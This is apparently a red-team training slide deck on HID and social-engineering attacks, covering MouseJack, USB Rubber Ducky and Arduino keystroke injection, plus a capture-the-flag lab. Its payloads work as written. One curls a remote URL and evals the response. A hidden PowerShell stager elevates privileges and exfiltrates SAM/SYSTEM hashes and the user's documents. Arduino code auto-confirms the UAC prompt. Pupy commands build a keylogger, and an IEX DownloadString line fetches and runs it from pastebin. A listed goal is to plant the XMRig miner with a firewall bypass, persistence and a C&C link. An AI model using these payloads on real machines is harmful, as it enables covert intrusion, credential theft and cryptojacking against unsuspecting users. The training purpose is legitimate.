Red Team Practical Attacks

S01E01

HID attacks - SE techniques

Giacomo Pezzi

Edoardo Rosa

The Red Team

In military jargon, the term Red Team is traditionally used to identify highly skilled and organized groups acting as fictitious rivals and/or enemies to the “regular” forces, the Blue Team.

The beginning

Historically, a red team was a group of military personnel playing the role of adversaries, the role of the enemy or opposing force team (“RED”), as opposed to the friendly forces team (“BLUE”). With time, the red teams mission and capabilities evolved and they turned into a force tasked with challenging the security posture of military bases, outposts and other “targets”.

The 80s/90s

Corporations in general and high-tech companies in particular sought a way to test their security posture and see whether they were vulnerable to attacks they didn’t account or plan for. The early civilian red teams were mostly information/computer security professionals mixed with physical security experts and they were mainly focused on what was then possible with the technology of the day.

Today

Today both government and private organizations use Red Teams not only to test the current state of their physical and digital security but also to continuously challenge the plans, defensive measures and security concepts/policies.

These exercises result in a better understanding of possible adversaries and help to improve counter measures against them and future threats. 

Red

  • explore any possible way to plan and carry out an attack with the attitude of potential assailants
  • identify any vulnerability in the PPT (People, Process and Technology) defensive system
  • think outside the box

Blue

  • incident response
  • mitigation
  • log analysis / sys monitoring
  • the masters of SOC

 

The Vicious Circle

they help the organization improve its own defensive abilities -> interaction and mutual feedback

..on both sides, human intuition, expertise and cleverness cannot be replaced! So:

Italian Blue Team Example:

Physical Penetration Testing

If you know the enemy and know yourself, you need not fear the result of a hundred battles.


Sun Tzu: The Art of War

I am totally secure!

You can have the best firewalls and change control procedures; you can have regular electronic penetration testing against networks and applications; you can audit your source code and lock down your servers. All of these approaches are fine and, if conducted well, are generally worthwhile. However, if an attacker can physically penetrate your premises and access information systems directly, these strategies won’t protect you.

Defence POV

Technologies that are commonly deployed to keep intruders out:

  • badges and access tokens
  • guards
  • cameras
  • physical access controls
  • ...

Attack POV

Technologies that are commonly used by a attacker physical pentester:

  • Break-In
  • HID Attacks
  • Social Engineering
  • ...

The Physical Aspect

Lockpicking

The art of unlocking a lock by manipulating the components of the lock device without the original key.

Irruption

  • no code
  • no CVE
  • no framework
  • no buffer overflow
  • no asm
  • no ebuild

 

only tricks!

RFID

Radio-frequency identification uses electromagnetic fields to automatically identify and track tags attached to objects.

Main frequencies:

- 125 KHz

- 13 MHz

RFID Attacks

4,50 € - read 125 KHz

6,50 € - read 13 MHz

12 € - clone 125 KHz

HID

Attacks

Against (!)Humans

A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.

The term "HID" most commonly refers to the USB-HID specification.
 

  • Keyboard, Mouse, Game Controllers, Drawing tablets, etc
  • most of the times don’t need external drivers to operate

  • not under AntiViruses' scope

The Attack

An HID Attack could lead to a payload delivery or  a data exfiltration simply using a pre-programmed USB stick that act as a HID device: for example a specialized tool to SPOOF keyboard input.

By default, operating systems tend to allow keyboards and mouse full control of the system. Using timed commands, it is easy to run a complete drive-by HID attack in 20 seconds, possibly even less. It also avoids detection in some ways as you are ‘physically pressing the keys’ – or at least, that’s what the computer thinks.

Most antivirus software will not protect you against this kind of an attack.

From OS view the user is typing on his keyboard!!

MouseJack

Vulnerabilities affecting non-Bluetooth wireless mice and keyboard discovered by Marc Newlin by Bastille Threat Research Team.

 

https://www.bastille.net/

https://www.mousejack.com/

 

This kind of vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using an USB dongle.

MouseJack - Why

Wireless mice and keyboards cumminicate using a proprietary standard protocols operating in the 2.4GHz ISM band (Industrial, Scientific, Medical):

there is no standard to follow

 

Each vendor can implement his own security scheme.

MouseJack - Why

Researcher discovered that the some dongles don't implement an encryption protocol at all or the encryption is not flawless and can also process specially crafted packets which generate key press instead of mouse movement/clicks.

- keystroke injection, spoofing a mouse

- keystroke injection, spoofing a keyboard

- forced pair

MouseJack - How

CrazyRadio PA by bitcraze is an opensource device with an amplified nRF24L-based USB dongle: equivalent to an amplified version of the common USB dongle for mice and keyboards.

- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface
 

 

30 € su Amazon......

MouseJack - Tools

MouseJack - Example

- choose victim with a possibile unpatched/vulnerable device

MouseJack - Example

- gather informations about OS, keybinding, installed tools, etc

 

 

 

 

 

 

 

Ty github... <3

MouseJack - Example

- write exploit

 

DELAY 1000
GUI-SHIFT ENTER
DELAY 600
STRING (x=$(\curl -sL https://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER

USB Rubber Ducky

- Data Exfiltration -

Specs

The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. When it is plugged into a computer, it instead registers itself as a USB keyboard on the system and fires off a keystroke payload at lightning speed.

Pros

  • simple scripting language
  • covert design
  • multiplatform
  • TwinDuck firmware
  • multipayload (caps-ins-num)
  • changeable VID/PID

Cons

  • expensive (~50$)
  • not always reliable
  • old..

Ducky Script - Simple!

Payloads are crafted using a simple scripting language and can be used to drop reverse shells, inject binaries, brute force pin codes, and many other automated functions for the penetration tester and systems administrator. Writing scripts can be done from any common text editor.

 

Ducky Script - Syntax pills (1)

Command Parameters
REM -
DELAY 0..->
STRING a...z A...Z 0..9 !...) `~ += _- "' :; <, >. ?/ \ and pipe
REPEAT (n) numbers of time to repeat
(*)ARROW left, right, up or down arrow

Ducky Script - Syntax pills (2)

Command Optional Parameters
GUI Single char
SHIFT DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB
ALT END, ESC, ESCAPE, F1...F12, Single Char, SPACE, TAB
CTRL BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single Char

See more on: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript

Ducky Script - Compiling

Ducky Scripts are compiled into hex files ready to be named inject.bin and moved to the root of a microSD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder.

Best experience: https://github.com/kevthehermit/DuckToolkit

Best automation: https://ducktoolkit.com/

Attacker

USB Rubber Ducky

  • TwinDuck firmware
  • microSD 8GB
  • generic 'Flash Drive' VID/PID

Victim

Windows 10 64

  • locale & keyboard: ITA
  • Avira AV free on top
  • Windows Defender up
  • Windows Firewall up
  • User away for 2 minute

Exfiltration &  gathering informations:

  • steal valuable informations (sharing, file tree, installed sw, password)
  • steal SAM/SYSTEM files (-> samdump2, john)
  • steal various documents
  • fast as possible!!!

Goals

Execution - Keystroke Injection

DELAY 4000
GUI r
DELAY 100
STRING powershell -command "Start-Process powershell -Verb runAs -ArgumentList '-w h -c  .(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+'':\d.cmd'') ' "
DELAY 100
ENTER
DELAY 1100
LEFTARROW
DELAY 50
ENTER

Execution - Features (1)

Multi-stager payload -> CAPSLOCK blinking every stage:

"$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

Hidden execution:

d.cmd (executed by keystroke) will invisibly execute e.cmd using the i.vbs

Execution - Features (2)

Multi-feature stager:

e.cmd (executed by d.cmd) will execute the  p.ps1 -> reporting + SAM/SYSTEM exfiltration

 

 

 

 

 

and try to make some pure data exfiltration -> steal files placed in %USERPROFILE%\Documents, until the ducky is unplugged by the attacker

Execution - Features (3)

Believability inside:

 

Looks like a generic flash drive -> TwinDuck firmware

 

Emulation of the most common USB flash drive chipsets: Alcor Micro Corp's (0x058F) generic 'Flash Drive' (0x6387) -> vidpid.bin on microSD root, optionally hidden

 

Choose a story for your drive -> NO LIMITS!!!

Demo

Arduino

- Fun&Profit -

Hardware - Arduino Micro

Arduino Micro is the small board easy to integrate it in everyday objects to make them interactive.


The Micro is based on the ATmega32U4 microcontroller featuring a built-in USB which makes the Micro recognisable as a mouse or keyboard.

Pros

  • cheap (18 €)
  • hackable
  • Mouse and Keyboard lib
  • general purpose
  • tons of lib
  • open
  • https://nurrl.github.io/Duckuino/

Cons

  • need soldering
  • Arduino language
  • ugly af
  • no storage

Example

#include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(6000);
  run_powershell_admin();
  payload(String"ciao"));
  Keyboard.end();
}

void run_powershell_admin() {
  // Win+x
  Keyboard.press(KEY_LEFT_GUI);
  delay(300);
  Keyboard.releaseAll();
  Keyboard.println("notepad");
  delay(500);
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(800);
  bypass_uac();
}
void bypass_uac() {
  Keyboard.press(KEY_LEFT_ARROW);
  Keyboard.release(KEY_LEFT_ARROW);
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(800);
}

void payload(String str) {
  Keyboard.println(str);
  delay(400);
  Keyboard.press(KEY_RETURN);
}

void loop() { }

Goals

  • download XMRig
  • execute XMRig
  • connect to C&C
  • add persistence
  • block threat intel
  • avoid detection

Execution

Arduino is able only to inject keystrokes: no drive storage!!!!

Download the payload from a known and controller source: pastebin.com

Disable Firewall to access XMR pool and C&C server

How to start the download?

Run as Administrator

Execution - Connection to C&C

https://github.com/n1nj4sec/pupy

Setup Server:

./pupysh.py -p 4444 -t http

Generate Client Payload:

./pupygen.py -s keylogger -f ps1 -O windows connect --host 192.168.1.111:4444 -t http

Upload to pastebin:

https://pastebin.com/YaUXbj3W

Use inside main script:

IEX ((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/YaUXbj3W'))

Execution

String hejo = String("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX ((New-Object Net.WebClient).
DownloadString('http://pastebin.com/raw/KRQFLR83'));\";exit");

Powershell payload:

Run a powershell console ad Administrator:

void run_powershell_admin() {
  // Win+x
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(char(120));
  delay(300);
  Keyboard.releaseAll();
  // a
  Keyboard.press(char(97));
  delay(800);
  bypass_uac();
}

Execution Time:

11 s

Demo

Lab

Choose your Weapon

Rules Of Engagement

  • Target: Windows 10 64 ITA - VM
  • you have to find the flag: hejo{...}
  • Avira AV free
  • Windows Firewall on
  • Windows Defender on
  • away about 1 minute on coffee break (surreal)
  • huge mr. robot fan (so the attacker)
  • strange intercom photos collector (weirdo)

Specs

The Target

Have Fun!

RTFM

By Edoardo Rosa

RTFM

  • 1,773